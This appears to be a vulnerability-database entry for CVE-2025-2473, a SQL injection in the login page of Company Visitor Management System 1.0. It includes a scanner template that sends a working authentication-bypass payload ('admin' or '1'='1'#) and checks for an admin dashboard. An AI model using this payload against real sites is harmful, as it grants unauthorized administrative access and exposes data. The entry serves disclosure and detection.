CVE-2025-2473: Company Visitor Management System 1.0 - SQL Injection

日期: 2025-08-01 | 影响软件: Company Visitor Management System | POC: 已公开

漏洞描述

Company Visitor Management System 1.0 contains a SQL injection vulnerability via the login page in the username parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.

PoC代码[已公开]

id: CVE-2025-2473

info:
  name: Company Visitor Management System 1.0 - SQL Injection
  author: arafatansari
  severity: critical
  description: |
    Company Visitor Management System 1.0 contains a SQL injection vulnerability via the login page in the username parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://www.exploit-db.com/exploits/48884
    - https://packetstormsecurity.com/files/158476/Company-Visitor-Management-System-CVMS-1.0-SQL-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2473
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-2473
    epss-score: 0.15482
    epss-percentile: 0.9437
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,cvms,sqli,auth-bypass,cms,edb,packetstorm,vuln

http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin%27+or+%271%27%3D%271%27%23&password={{rand_base(5)}}&login=

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Admin user'
          - 'Dashboard'
          - 'CVMS'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022045c3c2aa2b2160481bdea32dd9030b05dd381508b4c34c21ab33d3ca2c88d59e022100ce7d0665f4c5e5b0e37c19b8d35b36ff5d00cbb23cb4c54e16a2a06f2bc3abf3:922c64590222798bb761d5b6d8e72950